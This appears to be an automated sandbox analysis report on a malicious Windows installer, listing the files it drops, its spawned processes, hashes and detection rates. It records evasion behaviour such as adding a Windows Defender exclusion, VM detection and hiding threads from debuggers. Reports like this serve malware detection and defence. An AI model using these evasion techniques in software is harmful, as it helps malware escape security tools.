behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580230 Sample: #U5b89#U88c5#U52a9#U624b1.0.3.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 92 107 Multi AV Scanner detection for dropped file 2->107 109 Multi AV Scanner detection for submitted file 2->109 111 Found driver which could be used to inject code into processes 2->111 113 2 other signatures 2->113 11 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 28 other processes 2->18 process3 file4 105 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 11->105 dropped 20 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 3 5 11->20         started        24 sc.exe 1 14->24         started        26 sc.exe 1 16->26         started        28 sc.exe 1 18->28         started        30 sc.exe 1 18->30         started        32 sc.exe 1 18->32         started        34 24 other processes 18->34 process5 file6 91 C:\Users\user\AppData\Local\...\update.vac, PE32 20->91 dropped 93 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->93 dropped 115 Adds a directory exclusion to Windows Defender 20->115 36 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 20->36         started        39 powershell.exe 23 20->39         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 23 other processes 34->54 signatures7 process8 file9 95 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 36->95 dropped 56 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 4 16 36->56         started        117 Loading BitLocker PowerShell Module 39->117 60 conhost.exe 39->60         started        62 WmiPrvSE.exe 39->62         started        signatures10 process11 file12 97 C:\Users\user\AppData\Local\...\update.vac, PE32 56->97 dropped 99 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 56->99 dropped 101 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->101 dropped 103 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 56->103 dropped 119 Query firmware table information (likely to detect VMs) 56->119 121 Protects its processes via BreakOnTermination flag 56->121 123 Hides threads from debuggers 56->123 125 Contains functionality to hide a thread from the debugger 56->125 64 7zr.exe 2 56->64         started        67 cmd.exe 56->67         started        69 cmd.exe 56->69         started        71 2 other processes 56->71 signatures13 process14 file15 89 C:\Program Files (x86)\...\tProtect.dll, PE32+ 64->89 dropped 73 conhost.exe 64->73         started        75 sc.exe 1 67->75         started        77 sc.exe 69->77         started        79 sc.exe 71->79         started        81 conhost.exe 71->81         started        process16 process17 83 conhost.exe 75->83         started        85 conhost.exe 77->85         started        87 conhost.exe 79->87         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b1.0.3.exe0%ReversingLabs
#U5b89#U88c5#U52a9#U624b1.0.3.exe7%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc15%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b1.0.3.exefalse
    high
    https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drfalse
      high
      https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drfalse
        high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580230
        Start date and time:2024-12-24 04:52:06 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 11s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
        renamed because original name is a hash value
        Original Sample Name:1.0.3.exe
        Detection:MAL
        Classification:mal92.evad.winEXE@137/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 28
        • Number of non-executed functions: 75
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.85.23.206, 13.107.246.63
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        22:52:56API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b1.0.3.tmp modified
        22:52:59API Interceptor24x Sleep call for process: powershell.exe modified
        No context
        No context
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951703
                            Encrypted:true
                            SSDEEP:49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
                            MD5:310C3D7BE8A2AE42D4AB349F9F46F46C
                            SHA1:82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
                            SHA-256:20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
                            SHA-512:2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
                            Malicious:false
                            Preview:.@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 15%, Browse
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951703
                            Encrypted:true
                            SSDEEP:49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
                            MD5:310C3D7BE8A2AE42D4AB349F9F46F46C
                            SHA1:82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
                            SHA-256:20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
                            SHA-512:2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
                            Malicious:false
                            Preview:.@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.9968380149923775
                            Encrypted:true
                            SSDEEP:1536:eIJEBB8fJtUFlKiedDsLrObUvIjwBlnoL8AE:rEBBGiwDwE83
                            MD5:6520FCCCF7582751CB5C0EDA1135F0CE
                            SHA1:8F2F62DDF46BB755B927879E5F306D87EE366628
                            SHA-256:7682005B326053CDB2DB5728AA8E41A27216379407C1CFBE616FBA3E8ECAF660
                            SHA-512:2907078ED6E68183C38C15000F65696D25AACBAC1172BFB599EDAAEA992A7789E0D087DC1AD0B789B51C699A31AD8F3D624466532706C822C191EC2889FBC91C
                            Malicious:false
                            Preview:.@S.......N| .................]..|.1....M."..Fc..m..0...y=.a..A.!.....}1...<yk......I.#......j...^+#...G.Q./-.?:;=.m..8%.FO..<q..$..1....(.bf..TS....J&..c...........2z..8.|...).......c...R......Z..f.4`.....0=1$..]<<C..UVy).......>..........i..>...,....q..u.<...{.~g.,..N....u.8..!.;..p......6.1.....*.rG..!..I@..;..~c..l....V.P..YS.....,Gg.T...q....7p.Z`.r......*....:F.E..%..K+.%hEE.J......l..i_..CR....a..^....kQ.i......$..(.d.V.M;YX..|."..C.4..G...F....-...p..%..Ip.r....a.y.....W....$....kd...2.z6o..e....... I.@..)A.WL<..z.WsM;........0pfA.m....{.M......K...'.......>.......[.gO......H....+.#.,...7N:..l|.Zg......l.+....a...t.]./.?.Kv..m.........Bq..~.YP?N7.+P3....k...E.......?..<l...!S.4..N.8......#?@)...?M.\C.rUi.F.<...p.R.p~.'..c..'S..t v.g....X....h.W.I....P..U.'..oJ.'.-.{?.._....W....0.+N.+.P.vwF..\/..-{.%..e].q.=.@.|.@.B.\.."......X....@..^..F.c...@7..T.....1...k!.1[.!.D.............-......Q.........<.._/s9n&..78....V..p.C
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996838014992376
                            Encrypted:true
                            SSDEEP:768:3+wwYQzmSwBLGw8b95CEHJGDARzCh+7poOvotI0NtK+pfrNPnnsYa+7VyzlKx6qK:3SjMN2JGD6eRy21jNPnsYsRT9VN
                            MD5:7298ADFBE18EAEBBFFAF9733A10E1579
                            SHA1:49CE3A1424E05114FAD9A68035C6BDEC1EB4062C
                            SHA-256:3AADE7040A0D5452FA649088C6B3E1629457B0BC741A390F12BF6BDEBC892CD8
                            SHA-512:37B3BF7ECFC05FED760181B64F8F66E16024B9926F4F3888C6BD5CDFA94F35D92598E5DBD312FE741118302861628AC8E411585C68B8A5B819251FC46EE9FDF6
                            Malicious:false
                            Preview:7z..'...2.y.........2.......-Q.|.~..B.~.`j...<k..2a9h.XE.c...o./..S..B6..D....&....!h...r..$d.Z.^e.3...$....Z4......g....<.w<..J..[...;XL.j,.'.p...6'd..UR.$..U..I..T.(.i...z.p2.9.lji.9.....0..(..cT.jDW.l..y.u.G......B3....eR.....L<xB.....0.GV.0T...C..WDB.*(..B.tA.....7.4....g(...xa...jI....$C.swm..Y.#.h_.P.n.q.....mL...g.t....j./.......=....f.Ee..].Ak........!.:.9n|.G..+.j..nC....j.N...x...J..<.L.`..Xt*.."....n.f.Gw.h.....}...m/.:..S.n......m..,.#[>....?.&G.K...M\0a../..8J#._.]..8m...I..@.W}..t5...|.>.`l#.7..}.@|."e.o.v.M..+}.d...t".q....Pk.....d...n.<1t5-.....DL..IWq..6#...9.pm.P@~z.b._....QNe...+...P.........I9|.."..Ko_E....2..^.2`...[..ui......Y.:a.W...B.+'..h6.....r...|..b..SD..*.[1AK&...~..Y...X.<6{....<,......p.'.z..m...}.@..P1..o.`.....,..z..a...<..F.)U..(.!.t...T.....c....~..N...+.....Ks9<.3..f.P.L.g.B...6)..n....(...h.;...f.......P.lJB.......^.3....G..M...VT..S....&{.S..7...*.^\L...U.sKg.G...K..a.lhG.$>.tI.5}9s....@...].sQ,'..Hle.n.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
